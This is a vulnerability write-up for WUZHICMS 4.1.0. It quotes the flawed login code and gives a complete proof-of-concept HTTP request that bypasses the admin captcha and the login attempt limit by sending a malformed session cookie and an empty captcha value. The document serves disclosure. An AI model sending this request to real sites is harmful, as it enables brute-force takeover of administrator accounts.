WUZHICMS4.1.0-Captcha bypass (logic vulnerability).md

WUZHICMS4.1.0-Captcha bypass (logic vulnerability)

Vulnerable file

coreframe\app\core\admin\index.php 131-159

    function login() {
        
        if (isset($_SESSION['uid']) && $_SESSION['uid']!='') {
            MSG(L('already login'), '?m=core&f=index'.$this->su(0));
        }

        if(isset($GLOBALS['submit'])) {
            if(!isset($_SESSION['code']) && $_SERVER["SERVER_NAME"]!=parse_url(WEBURL, PHP_URL_HOST)) { //!!!!![logic wrong]:"&&" should be "||"
                MSG(L('session error'));
            }
            if(strtolower($GLOBALS['checkcode']) != $_SESSION['code']) {    //[Weak comparison]: ''==null
                $_SESSION['code'] = '';  
                MSG(L('checkcode error'),'?m=core&f=index&v=login'.$this->su());
            }
            

            $username = isset($GLOBALS['username']) ? p_htmlspecialchars($GLOBALS['username']) : '';
            $password = isset($GLOBALS['password']) ? $GLOBALS['password'] : '';

            $this->check_login($username,$password);

            $_SESSION['uid'] = $_SESSION['role'] = 0;
            MSG(L('username or password error'),'?m=core&f=index&v=login'.$this->su());
        } else {
            
            include $this->template('login');
        }
    }

POC

exp:

POST /index.php?m=core&f=index&v=login&_su=wuzhicms&_menuid= HTTP/1.1
Host: wuzhicms
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://wuzhicms
Connection: close
Referer: http://wuzhicms/index.php?m=core&f=index&v=login&_su=wuzhicms
Cookie: PHPSESSID=l2cj791pegou3rmvtb86drui54'; TFq_siteid=M0RkIN5aqxivSePkL2cUow%3D%3D
Upgrade-Insecure-Requests: 1

username=admin&password=admin&checkcode=&submit=

(I have set: define('TEST_CHECKCODE',0);, so the CAPTCHA is generated normally.)

result

\coreframe\app\core\libs\class\session.class.php 55-59

When the PHPSESSID in the cookie is changed to an illegal ID l2cj791pegou3rmvtb86drui54', in \coreframe\app\core\libs\class\session.class.php, the method WUZHI_session->read($id) will be passed a random new ID, resulting in a bypass.

(The automatically generated new ID leads to an empty query result, which means the global variable '$_SESSION' will be empty) .

Login attempt limit becomes ineffective

The database also has records, and all critical data in the 'data' segment are present. If someone generates a large number of illegal IDs, it could pose a potential threat